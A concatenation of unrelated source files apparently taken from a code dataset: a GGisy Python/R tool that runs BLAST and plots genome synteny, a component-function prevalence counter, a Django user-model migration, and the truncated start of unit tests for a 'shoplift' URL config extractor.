"sklearn.metrics.precision_score",
"sklearn.metrics.recall_score",
"numpy.array",
"numpy.sum",
"warnings.filterwarnings",
"numpy.round"
] | [((699, 727), 'vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer', 'SentimentIntensityAnalyzer', ([], {}), '()\n', (725, 727), False, 'from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n'), ((1592, 1625), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (1615, 1625), False, 'import warnings\n'), ((4108, 4142), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""default"""'], {}), "('default')\n", (4131, 4142), False, 'import warnings\n'), ((2846, 2875), 'sklearn.metrics.precision_score', 'precision_score', (['ytest', 'ypred'], {}), '(ytest, ypred)\n', (2861, 2875), False, 'from sklearn.metrics import precision_score, recall_score, f1_score\n'), ((2893, 2919), 'sklearn.metrics.recall_score', 'recall_score', (['ytest', 'ypred'], {}), '(ytest, ypred)\n', (2905, 2919), False, 'from sklearn.metrics import precision_score, recall_score, f1_score\n'), ((2933, 2955), 'sklearn.metrics.f1_score', 'f1_score', (['ytest', 'ypred'], {}), '(ytest, ypred)\n', (2941, 2955), False, 'from sklearn.metrics import precision_score, recall_score, f1_score\n'), ((3508, 3542), 'numpy.mean', 'np.mean', (['result_table_copy'], {'axis': '(0)'}), '(result_table_copy, axis=0)\n', (3515, 3542), True, 'import numpy as np\n'), ((3938, 4012), 'tabulate.tabulate', 'tabulate', (['result_table'], {'tablefmt': '"""pipe"""', 'stralign': '"""center"""', 'headers': 'header'}), "(result_table, tablefmt='pipe', stralign='center', headers=header)\n", (3946, 4012), False, 'from tabulate import tabulate\n'), ((2020, 2031), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (2028, 2031), True, 'import numpy as np\n'), ((2033, 2044), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (2041, 2044), True, 'import numpy as np\n'), ((3075, 3097), 'numpy.round', 'np.round', (['train_acc', '(2)'], {}), '(train_acc, 2)\n', (3083, 3097), True, 'import numpy as np\n'), ((3099, 3120), 'numpy.round', 'np.round', (['test_acc', '(2)'], {}), '(test_acc, 2)\n', (3107, 3120), True, 'import numpy as np\n'), ((3144, 3166), 'numpy.round', 'np.round', (['precision', '(2)'], {}), '(precision, 2)\n', (3152, 3166), True, 'import numpy as np\n'), ((3168, 3187), 'numpy.round', 'np.round', (['recall', '(2)'], {}), '(recall, 2)\n', (3176, 3187), True, 'import numpy as np\n'), ((3211, 3226), 'numpy.round', 'np.round', (['f1', '(2)'], {}), '(f1, 2)\n', (3219, 3226), True, 'import numpy as np\n'), ((3434, 3456), 'numpy.array', 'np.array', (['result_table'], {}), '(result_table)\n', (3442, 3456), True, 'import numpy as np\n'), ((3237, 3246), 'numpy.sum', 'np.sum', (['y'], {}), '(y)\n', (3243, 3246), True, 'import numpy as np\n')] |
from __future__ import with_statement
# ==============================================================================
# GGisy (python v2.7)
#
# Author: <NAME> (<EMAIL>)
# Bugs and errors: https://github.com/Sanrrone/GGisy/issues
#
# Please type "python GGisy.py -h" for usage help
#
# ==============================================================================
__author__ = '<NAME> (<EMAIL>)'
__version__ = '1.0'
import sys, os, subprocess, glob, csv, collections
from optparse import OptionParser
from operator import itemgetter
from Bio import SeqIO
def main():
parser = OptionParser(usage = "Usage: python GGisy.py -r genome1.fna -q genome2.fna")
parser.add_option("-r","--reference",dest="genome1",help="First genome to be used as reference", default=None)
parser.add_option("-q","--query",dest="genome2",help="Second genome to be used as query against the first genome (-r)", default=None)
parser.add_option("-l","--alignmentLength",dest="alignL",help="Aligment length cutoff in blast output [default: 1000]",default=1000)
parser.add_option("-e","--evalue",dest="evalue",help="E-value cutoff for blastn search [default: 1e-3]",default=1e-3)
parser.add_option("-i","--identity",dest="Identity",help="Identity cutoff on the blastn alignment to consider the region [default: 50]",default=50)
parser.add_option("-t","--threads",dest="Threads",help="Number of threads to be used for blast [default: 4]",default=4)
parser.add_option("-b","--blastout",dest="Blastout",help="Blast output file to be used instead doing it [default: none]",default=None)
parser.add_option("-c","--clean",dest="clean",help="clean files after execution [default: True]",default=True)
(options,args) = parser.parse_args()
genome1 = str(options.genome1)
genome2 = str(options.genome2)
alignL= int(options.alignL)
evalue= str(options.evalue)
Identity= int(options.Identity)
threads= str(options.Threads) #for subcallproccess must be str()
blastout= options.Blastout #dont cast to str
cleanf=options.clean
#check variables
if not genome1 or genome1 is None:
print("* No genome was provided (-g1), use -h for help")
sys.exit()
else:
if os.path.isfile(genome1) == False:
print("*",genome1," doesn't exist")
sys.exit()
if not genome2 or genome2 is None:
print("* its mandatory provide 2 genomes (-g2), use -h for help")
sys.exit()
else:
if os.path.isfile(genome2) == False:
print("* ",genome2," doesn't exist")
sys.exit()
if blastout != None:
if os.path.isfile(blastout) == False:
print("* ", blastout, "not found, check if file exist or let the program do the blast omiting this option (-b)")
sys.exit()
blastBIN=which("blastn")
if blastBIN == None:
print("No blastn was found, install it before continue (make sure is in your $PATH)")
sys.exit()
makeblastBIN=which("makeblastdb")
if makeblastBIN == None:
print("No makeblastdb was found, install it from blast+ (make sure is in your $PATH)")
sys.exit()
rscriptBIN=which("Rscript")
if rscriptBIN == None:
print("No Rscript was found, make sure is in your $PATH")
sys.exit()
Inputs = collections.namedtuple('Inputs', ['v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8'])
I = Inputs(genome1, genome2, alignL, evalue, Identity, threads, blastout, cleanf)
return I
def which(program): #function to check if some program exists
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def blasting(genome1, genome2, evalue, threads):
#searching for blast binaries
subprocess.call(["makeblastdb", "-in", genome1, "-input_type", "fasta", "-dbtype", "nucl", "-out", "ref"])
subprocess.call(["blastn", "-query", genome2, "-db", "ref",
"-evalue", evalue, "-outfmt", "6", "-strand", "both",
"-num_threads", threads, "-out", "tmp.tsv"])
return str("tmp.tsv")
def filterBlastOutput(blastout,alignL,evalue,identity):
PARSED=open("synteny.tsv",'w') #overwrite if exist
with open(blastout) as tsvfile:
tsvreader = csv.reader(tsvfile, delimiter="\t")
for line in tsvreader:
#formula line [n-1:n]
toint = [int(i) for i in line[3:4]]
if toint[0] >= alignL:
toint = [float(i) for i in line[2:3]]
if toint[0] >= float(identity):
PARSED.write("\t".join(map(str, line[0:3]+line[6:10]))+"\n")
PARSED.close()
def parsingGenomes(genome):
gname = genome.split('/')[-1]
PARSED=open(str(gname+"_info.tsv"),'w') #overwrite if exist
fasta_sequences = SeqIO.parse(open(genome),'fasta')
for fasta in fasta_sequences:
name, sequence = fasta.id, str(fasta.seq)
lengthSeq= len(sequence)
PARSED.write("%s\t1\t%s\n" % (name, lengthSeq))
PARSED.close
return str(gname+"_info.tsv")
def handleR(conn, reference, query, alignL):
plotstep=open("handle.R", 'w')
plotstep.write("""rm(list=ls());
library(OmicCircos)
library(RColorBrewer)
library(varhandle)
args<-commandArgs()
handlefile<-as.character(args[6])
refname<-as.character(args[7])
queryname<-as.character(args[8])
filterl<-as.numeric(args[9])
handle<-read.table(handlefile,sep = "\\t",stringsAsFactors = F,check.names = F)
ref<-read.table(refname,sep = "\\t",stringsAsFactors = F,check.names = F)
query<-read.table(queryname,sep = "\\t", stringsAsFactors = F,check.names = F)
rownames(ref)<-ref$V1
rownames(query)<-query$V1
qryUniq<-unique(sort(handle$V1))
refUniq<-unique(sort(handle$V2))
ref<-ref[refUniq,]
ref<-ref[with(ref, order(-V3, V1)), ]
query<-query[qryUniq,]
query<-query[with(query, order(+V3, V1)), ]
data<-rbind(ref,query)
refname<-unlist(strsplit(refname,"_info.tsv"))[1]
queryname<-unlist(strsplit(queryname,"_info.tsv"))[1]
lowId<-min(handle$V3)
fhand<-handle[handle$V6<handle$V7,]
rhand<-handle[handle$V6>handle$V7,]
linkf<-data.frame(seg1=fhand$V1, start1=fhand$V4, end1=fhand$V5, seg2=fhand$V2, start2=fhand$V6, end2=fhand$V7, stringsAsFactors = F)
linkr<-data.frame(seg1=rhand$V1, start1=rhand$V4, end1=rhand$V5, seg2=rhand$V2, start2=rhand$V6, end2=rhand$V7, stringsAsFactors = F)
#fix reverse positions
for(i in 1:nrow(linkr)){
contign<-linkr[i,4]
contigl<-ref[contign,3]
linkr[i,5]<- contigl-linkr[i,5]+1
linkr[i,6]<- contigl-linkr[i,6]+1
}
data["V5"]<-data["V4"]<-1
colnames(data)<- c("chr", "start", "end","V4","V5")
tocir <- segAnglePo(data, seg=data$chr)
gl<-sum(data$end)+nrow(data)
maxangr<-270+(350/gl)*sum(ref$V3)
spacer<-maxangr/(maxangr-270)/nrow(ref)
for(i in 1:nrow(ref)){
#358 is the total angles (aviable) for all
tocir[i,"angle.end"]<-as.character(as.numeric(tocir[i,"angle.start"]) + (350/gl)*as.numeric(tocir[i,7]))
tocir[i+1,"angle.start"]<-as.character(as.numeric(tocir[i,"angle.end"])+spacer)
}
tocir[i+1,"angle.start"]<-as.character(as.numeric(tocir[i+1,"angle.start"])+2.5)
tocir[i+1,"angle.end"]<-as.character(as.numeric(tocir[i+1,"angle.start"]) + (350/gl)*as.numeric(tocir[i+1,7]))
maxangq<-628-maxangr
spacer<-628/maxangq/nrow(query)
if(nrow(ref)+2>=nrow(tocir)){
i<-nrow(tocir)
tocir[i,"angle.start"]<-as.character(as.numeric(tocir[i-1,"angle.end"])+spacer)
tocir[i,"angle.end"]<-as.character(628)
}else{
for(i in (nrow(ref)+2):nrow(tocir)-1){
#358 is the total angles (aviable) for all
tocir[i,"angle.end"]<-as.character(as.numeric(tocir[i,"angle.start"]) + (350/gl)*as.numeric(tocir[i,7]))
tocir[i+1,"angle.start"]<-as.character(as.numeric(tocir[i,"angle.end"])+spacer)
}
}
refang<-as.numeric(tocir[1:nrow(ref),2])
qryang<-as.numeric(tocir[(nrow(ref)+1):(nrow(ref)+nrow(query)),2])
maxangr<-max(refang)
maxangq<-max(qryang)
faketocir <- tocir
faketocir[,1]<-""
maxangr<-max(refang)
for(i in 1:nrow(tocir)){
if(270+(maxangr-270)/2<as.numeric(tocir[i,2])){
break
}
}
faketocir[i,1]<-refname
maxangq<-max(qryang)
for(i in 1:nrow(tocir)){
if(maxangr+(maxangq-maxangr)/2<as.numeric(tocir[i,2])){
break
}
}
faketocir[i,1]<-queryname
colors<-rev(colorRampPalette(rev(brewer.pal(n = 7, name = "RdYlBu")))(20))
delta<-(100-lowId)/20
scaleColors<- function(x){
cArray<-c()
for(id in x){
for(i in 1:20){
if(id>=100-(delta*i)){
break
}
}
cArray<-c(cArray,colors[i])
}
return(cArray)
}
addalpha <- function(col, alpha=1){
if(missing(col))
stop("Please provide a vector of colours.")
apply(sapply(col, col2rgb)/255, 2,
function(x)
rgb(x[1], x[2], x[3], alpha=alpha))
}
black<-addalpha("#000000",0.7)
colors<-addalpha(colors,1)
try({
linkf[,"colors"]<-addalpha(scaleColors(fhand$V3),1)
},silent = T)
try({
linkr[,"colors"]<-addalpha(scaleColors(rhand$V3),1)
},silent = T)
pdf(file="synteny.pdf", width = 10, height =10)
if(nrow(data)<=20){
par(mar=c(2,2,2,2))
xorigin=700
yorigin=1000
plot(c(0,2000), c(0,2000), type="n", axes=FALSE, xlab="", ylab="", main="")
circos(R=450, cir=tocir, W=10,type="chr", print.chr.lab=T, scale=F,xc = xorigin,yc = yorigin,
col = c(rep("dark blue",nrow(ref)),rep("#FEE496",nrow(query))),cex = 5)
if(nrow(linkf)>0){
circos(R=440, cir=tocir, mapping=linkf , type="link.pg", lwd=0.5, col=linkf$colors,xc = xorigin,yc = yorigin)
}
if(nrow(linkr)>0){
circos(R=440, cir=tocir, mapping=linkr , type="link.pg", lwd=0.5, col=linkr$colors,xc = xorigin,yc = yorigin)
newlinkr<-linkr
newlinkr$start1<-newlinkr$start1+as.integer((newlinkr$end1-newlinkr$start1)/2)+1
newlinkr$start2<-newlinkr$start2+as.integer((newlinkr$end2-newlinkr$start2)/2)-1
circos(R=440, cir=tocir, W=10, mapping=newlinkr , type="link", lwd=0.6, col=black,xc = xorigin,yc = yorigin)
}
legend(x = 1500, y=1700, legend = c(refname,queryname),
ncol = 1, cex = 0.8, bty="n",
fill=c("dark blue","#FEE496"),
border = c("dark blue","#FEE496"),text.width=c(0.5,0.5),
title="Sequences")
legend(x = 1430, y=1500, legend = c(paste("Reference: ", nrow(ref), " (", sum(ref$V3), " bp)", sep = ""), paste("Query: ",nrow(query), " (", sum(query$V3), " bp)", sep="")),
ncol = 1, cex = 0.8, bty="n",
fill=c("dark blue","#FEE496"),
border = c("dark blue","#FEE496"),text.width=c(0.5,0.5),
title=paste("Contigs align >= ", filterl, " bp", sep=""))
legend(x = 1520, y=1300, legend = c("Forward","Reverse"),lty = c(0,1),merge=T,seg.len = 0.6,
ncol = 1, cex = 0.8, bty="n",
fill="white",
border = "black",text.width=c(0.5,0.5),
title="Strand Match\n(on reference)")
legend(x = 1505, y=1100, legend = c("100","","","","","","","","","",(100-lowId)/2 + lowId,"","","","","","","","",lowId),
ncol = 1, cex = 0.8, bty="n",
fill=colors,
border = colors,
y.intersp = 0.5,
x.intersp = 0.5,text.width=c(0.5,0.5),
title="Identity percent\n")
}else{
par(mar=c(2,2,2,2))
xorigin=750
yorigin=550
plot(c(0,1500), c(0,1500), type="n", axes=FALSE, xlab="", ylab="", main="")
circos(R=450, cir=faketocir, W=10,type="chr", print.chr.lab=T, scale=F,xc = xorigin,yc = yorigin,
col = "white")
circos(R=410, cir=tocir, W=10,type="chr", print.chr.lab=F, scale=F,xc = xorigin,yc = yorigin,
col = c(rep("dark blue",nrow(ref)),rep("#FEE496",nrow(query))),cex = 5)
if(nrow(linkf)>0){
highlightr <- c(420, 450, tocir[1,1], 1, tocir[nrow(ref),1], tocir[nrow(ref),7], "dark blue", NA)
circos(cir=tocir, mapping=highlightr, type="hl",xc = xorigin,yc = yorigin)
circos(R=400, cir=tocir, mapping=linkf , type="link.pg", lwd=0.5, col=linkf$colors,xc = xorigin,yc = yorigin)
}
if(nrow(linkr)>0){
highlightq <- c(420, 450, query[1,1], 1, query[nrow(query),1], query[nrow(query),3], "#FEE496", NA)
circos(cir=tocir, mapping=highlightq, type="hl",xc = xorigin,yc = yorigin)
circos(R=400, cir=tocir, mapping=linkr , type="link.pg", lwd=0.5, col=linkr$colors,xc = xorigin,yc = yorigin)
newlinkr<-linkr
newlinkr$start1<-newlinkr$start1+as.integer((newlinkr$end1-newlinkr$start1)/2)+1
newlinkr$start2<-newlinkr$start2+as.integer((newlinkr$end2-newlinkr$start2)/2)-1
circos(R=400, cir=tocir, W=10, mapping=newlinkr , type="link", lwd=0.3, col=black,xc = xorigin,yc = yorigin)
}
legend(x = 210, y=1500, legend = c(paste("Reference: ", nrow(ref), " (", sum(ref$V3), " bp)", sep = ""), paste("Query: ",nrow(query), " (", sum(query$V3), " bp)", sep="")),
ncol = 1, cex = 0.8, bty="n",
fill=c("dark blue","#FEE496"),
border = c("dark blue","#FEE496"),text.width=c(0.5,0.5),
title=paste("Contigs align >= ", filterl, " bp", sep=""))
legend(x = 270, y=1300, legend = c("Forward","Reverse"),lty = c(0,1),merge=T,seg.len = 0.6,
ncol = 1, cex = 0.8, bty="n",
fill="white",
border = "black",text.width=c(0.5,0.5),
title="Strand Match\\n(on reference)")
legend(x = 990, y=1500, legend = c("100","","","","","","","","","",(100-lowId)/2 + lowId,"","","","","","","","",lowId),
ncol = 1, cex = 0.8, bty="n",
fill=colors,
border = colors,
y.intersp = 0.5,
x.intersp = 0.5,text.width=c(0.5,0.5),
title="Identity percent\\n")
}
dev.off()""")
plotstep.close()
subprocess.call(["Rscript", "handle.R", conn, reference, query, str(alignL), "--vanilla"])
def cleanfiles(ginfo1, ginfo2):
if os.path.isfile("tmp.tsv"):
os.remove("tmp.tsv")
if os.path.isfile("ref.nin"):
os.remove("ref.nin")
if os.path.isfile("ref.nsq"):
os.remove("ref.nsq")
if os.path.isfile("ref.nhr"):
os.remove("ref.nhr")
if os.path.isfile("handle.R"):
os.remove("handle.R")
if os.path.isfile(ginfo1):
os.remove(ginfo1)
if os.path.isfile(ginfo2):
os.remove(ginfo2)
if __name__ == '__main__':
mainV=main()
blastout=mainV.v7
if blastout is None:
blastout=blasting(genome1=mainV.v1, genome2=mainV.v2, evalue=mainV.v4, threads=mainV.v6)
filterBlastOutput(blastout=blastout, alignL=mainV.v3, evalue=mainV.v4, identity=mainV.v5)
ref=parsingGenomes(genome=mainV.v1)
que=parsingGenomes(genome=mainV.v2)
handleR(conn="synteny.tsv",reference=ref, query=que, alignL=mainV.v3)
if mainV.v8 == True:
cleanfiles(ref,que)
sys.exit()
| [
"collections.namedtuple",
"os.access",
"os.path.join",
"optparse.OptionParser",
"os.path.split",
"os.path.isfile",
"subprocess.call",
"sys.exit",
"csv.reader",
"os.remove"
] | [((591, 665), 'optparse.OptionParser', 'OptionParser', ([], {'usage': '"""Usage: python GGisy.py -r genome1.fna -q genome2.fna"""'}), "(usage='Usage: python GGisy.py -r genome1.fna -q genome2.fna')\n", (603, 665), False, 'from optparse import OptionParser\n'), ((3104, 3190), 'collections.namedtuple', 'collections.namedtuple', (['"""Inputs"""', "['v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8']"], {}), "('Inputs', ['v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7',\n 'v8'])\n", (3126, 3190), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3442, 3464), 'os.path.split', 'os.path.split', (['program'], {}), '(program)\n', (3455, 3464), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3784, 3894), 'subprocess.call', 'subprocess.call', (["['makeblastdb', '-in', genome1, '-input_type', 'fasta', '-dbtype', 'nucl',\n '-out', 'ref']"], {}), "(['makeblastdb', '-in', genome1, '-input_type', 'fasta',\n '-dbtype', 'nucl', '-out', 'ref'])\n", (3799, 3894), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3892, 4058), 'subprocess.call', 'subprocess.call', (["['blastn', '-query', genome2, '-db', 'ref', '-evalue', evalue, '-outfmt',\n '6', '-strand', 'both', '-num_threads', threads, '-out', 'tmp.tsv']"], {}), "(['blastn', '-query', genome2, '-db', 'ref', '-evalue',\n evalue, '-outfmt', '6', '-strand', 'both', '-num_threads', threads,\n '-out', 'tmp.tsv'])\n", (3907, 4058), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13433, 13458), 'os.path.isfile', 'os.path.isfile', (['"""tmp.tsv"""'], {}), "('tmp.tsv')\n", (13447, 13458), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13487, 13512), 'os.path.isfile', 'os.path.isfile', (['"""ref.nin"""'], {}), "('ref.nin')\n", (13501, 13512), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13541, 13566), 'os.path.isfile', 'os.path.isfile', (['"""ref.nsq"""'], {}), "('ref.nsq')\n", (13555, 13566), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13595, 13620), 'os.path.isfile', 'os.path.isfile', (['"""ref.nhr"""'], {}), "('ref.nhr')\n", (13609, 13620), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13649, 13675), 'os.path.isfile', 'os.path.isfile', (['"""handle.R"""'], {}), "('handle.R')\n", (13663, 13675), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13705, 13727), 'os.path.isfile', 'os.path.isfile', (['ginfo1'], {}), '(ginfo1)\n', (13719, 13727), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13753, 13775), 'os.path.isfile', 'os.path.isfile', (['ginfo2'], {}), '(ginfo2)\n', (13767, 13775), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((14256, 14266), 'sys.exit', 'sys.exit', ([], {}), '()\n', (14264, 14266), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2131, 2141), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2139, 2141), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2348, 2358), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2356, 2358), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2791, 2801), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2799, 2801), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2955, 2965), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2963, 2965), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3082, 3092), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3090, 3092), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((4238, 4273), 'csv.reader', 'csv.reader', (['tsvfile'], {'delimiter': '"""\t"""'}), "(tsvfile, delimiter='\\t')\n", (4248, 4273), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13462, 13482), 'os.remove', 'os.remove', (['"""tmp.tsv"""'], {}), "('tmp.tsv')\n", (13471, 13482), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13516, 13536), 'os.remove', 'os.remove', (['"""ref.nin"""'], {}), "('ref.nin')\n", (13525, 13536), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13570, 13590), 'os.remove', 'os.remove', (['"""ref.nsq"""'], {}), "('ref.nsq')\n", (13579, 13590), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13624, 13644), 'os.remove', 'os.remove', (['"""ref.nhr"""'], {}), "('ref.nhr')\n", (13633, 13644), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13679, 13700), 'os.remove', 'os.remove', (['"""handle.R"""'], {}), "('handle.R')\n", (13688, 13700), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13731, 13748), 'os.remove', 'os.remove', (['ginfo1'], {}), '(ginfo1)\n', (13740, 13748), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((13779, 13796), 'os.remove', 'os.remove', (['ginfo2'], {}), '(ginfo2)\n', (13788, 13796), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2154, 2177), 'os.path.isfile', 'os.path.isfile', (['genome1'], {}), '(genome1)\n', (2168, 2177), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2230, 2240), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2238, 2240), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2371, 2394), 'os.path.isfile', 'os.path.isfile', (['genome2'], {}), '(genome2)\n', (2385, 2394), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2448, 2458), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2456, 2458), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2487, 2511), 'os.path.isfile', 'os.path.isfile', (['blastout'], {}), '(blastout)\n', (2501, 2511), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2641, 2651), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2649, 2651), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3373, 3394), 'os.path.isfile', 'os.path.isfile', (['fpath'], {}), '(fpath)\n', (3387, 3394), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3399, 3424), 'os.access', 'os.access', (['fpath', 'os.X_OK'], {}), '(fpath, os.X_OK)\n', (3408, 3424), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3615, 3642), 'os.path.join', 'os.path.join', (['path', 'program'], {}), '(path, program)\n', (3627, 3642), False, 'import sys, os, subprocess, glob, csv, collections\n')] |
"""
This is a simplified version to find statistical prevalence that counts instances and is numerically equivalent
to the confidence metric in association rules (# of occurrences / total occurrences).
"""
import csv
def count_stuff(filename):
"""
Counts instances and sorts them by prevalence
Parameters
----------
filename : string
A .csv file of a SQL query
Returns
-------
comb_sort
Returns a dictionary of function and flow combinations sorted by prevalence. The key is the
component and the value is a list of type: [function-flow, statistical prevalence]
"""
# Combinations of components, functions, and/or flows are stored in a dictionary with the first column
# as the key and the second column as the value
combos = {}
# Instances of each item in the columns are counted for later analysis
counts = {}
with open(filename, encoding='utf-8-sig') as input_file:
for row in csv.reader(input_file, delimiter=','):
# By convention, the first column is the component and the second column is the function and/or flow
comp = row[0]
func = row[1]
# Create a dictionary with a count of instances of each component
if comp not in counts:
counts[comp] = 1
else:
counts[comp] += 1
# Create a dictionary that tracks the number of times a component has a function and/or flow
if comp not in combos:
combos[comp] = {}
combos[comp][func] = 1
else:
if func not in combos[comp]:
combos[comp][func] = 1
else:
combos[comp][func] += 1
# (1) Convert the dictionary of a dictionary to a dictionary of lists for sorting then (2) divide the functions
# and/or flows for each component by the total number of component instances to get the percentage
# of each combination and (3) sort the dictionary by the percentages of each combination.
# (1) Convert
comb_sort = {}
for cs, fs in combos.items():
for k, v in combos[cs].items():
# (2) Divide
comb_sort.setdefault(cs, []).append([k, v / counts[cs]])
# (3) Sort
for k, v in comb_sort.items():
v.sort(key=lambda x: x[1], reverse=True)
return comb_sort
| [
"csv.reader"
] | [((1024, 1061), 'csv.reader', 'csv.reader', (['input_file'], {'delimiter': '""","""'}), "(input_file, delimiter=',')\n", (1034, 1061), False, 'import csv\n')] |
# Generated by Django 3.0.5 on 2020-09-06 20:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=500, verbose_name='description'),
),
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=40, unique=True, verbose_name='email'),
),
migrations.AlterField(
model_name='user',
name='role',
field=models.CharField(default='user', max_length=30, verbose_name='role'),
),
migrations.AlterField(
model_name='user',
name='token',
field=models.CharField(blank=True, max_length=36, verbose_name='token'),
),
]
| [
"django.db.models.EmailField",
"django.db.models.TextField",
"django.db.models.CharField"
] | [((318, 390), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(500)', 'verbose_name': '"""description"""'}), "(blank=True, max_length=500, verbose_name='description')\n", (334, 390), False, 'from django.db import migrations, models\n'), ((509, 576), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(40)', 'unique': '(True)', 'verbose_name': '"""email"""'}), "(max_length=40, unique=True, verbose_name='email')\n", (526, 576), False, 'from django.db import migrations, models\n'), ((694, 762), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""user"""', 'max_length': '(30)', 'verbose_name': '"""role"""'}), "(default='user', max_length=30, verbose_name='role')\n", (710, 762), False, 'from django.db import migrations, models\n'), ((881, 946), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(36)', 'verbose_name': '"""token"""'}), "(blank=True, max_length=36, verbose_name='token')\n", (897, 946), False, 'from django.db import migrations, models\n')] |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import unittest
import ConfigParser
from textwrap import dedent
from StringIO import StringIO
from mock import MagicMock, patch
from shoplift.config import *
from shoplift.exceptions import ConfigDoesNotExistException
BASE_CONFIG_TESTFILE = os.path.join(os.path.dirname(__file__), 'test_config.ini')
# Final output after parsing amazon_config_testdata.ini file and contents
product_output = {
'amazon': {
CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['amazon', 'junglee'],
CONFIG_KEY_PATHS: '/.*/dp/.*/.*',
},
'price': { CONFIG_KEY_METHOD: 'amazon_api.price_and_currency' },
'image_url':{ CONFIG_KEY_METHOD: 'amazon_api.large_image_url' },
'name': { CONFIG_KEY_METHOD: 'amazon_api.title' }
}
}
class TestExtractor(unittest.TestCase):
def setUp(self):
self.extractor = Extractor(BASE_CONFIG_TESTFILE)
self.maxDiff = None
for name, config in self.extractor.platforms.iteritems():
if name == 'flipkart':
self.flipkart_platform = (name, config)
elif name == 'amazon.com':
self.amazon_platform = (name, config)
elif name == 'itunes':
self.itunes_platform = (name, config)
elif name == 'apple':
self.apple_platform = (name, config)
def testCommaSeparatedToList(self):
'''Test for comma separated entities in the...
config file and returns them as expected
'''
# Input data for testing comma separated domain and path names
comma_separated_input = dedent("""
[flipkart]
url.domains = flipkart, flip.kart, flipkar.t, .flipkart, www.flipkart.com, flip-kart
url.path = (.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)
""")
# Final result list of comma separated domain names
comma_separated_output = {
'flipkart': {
CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: [
'flipkart',
'flip.kart',
'flipkar.t',
'.flipkart',
'www.flipkart.com',
'flip-kart'
],
CONFIG_KEY_PATHS: '(.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)'
},
}
}
comma_separated_ins_input = StringIO(comma_separated_input)
extractor_comma = Extractor(comma_separated_ins_input)
comma_to_list_product = extractor_comma.platforms
self.assertEqual(comma_to_list_product, comma_separated_output)
comma_separated_input0 = dedent("""
[ebay]
url.domains = ebay.com
url.path = *.////\s([^abc])
""")
comma_separated_output0 = {
'ebay': {
CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['ebay.com'],
CONFIG_KEY_PATHS: '*.////\s([^abc])'
},
}
}
comma_separated_ins_input0 = StringIO(comma_separated_input0)
extractor_comma0 = Extractor(comma_separated_ins_input0)
comma_to_list_product0 = extractor_comma0.platforms
self.assertEqual(comma_to_list_product0, comma_separated_output0)
def testConfigParserString(self):
'''Test for config parser method in case...
the input config is string
'''
# String testdata input
string_input = dedent("""
[amazon]
url.path = /.*/dp/.*/.*
url.domains = amazon, junglee
image_url = amazon_api.large_image_url
name = amazon_api.title
price = amazon_api.price_and_currency
""")
string_ins_input = StringIO(string_input)
extractor = Extractor(string_ins_input)
string_config_output = extractor.platforms
self.assertEqual(string_config_output, product_output)
def testConfigParserFile(self):
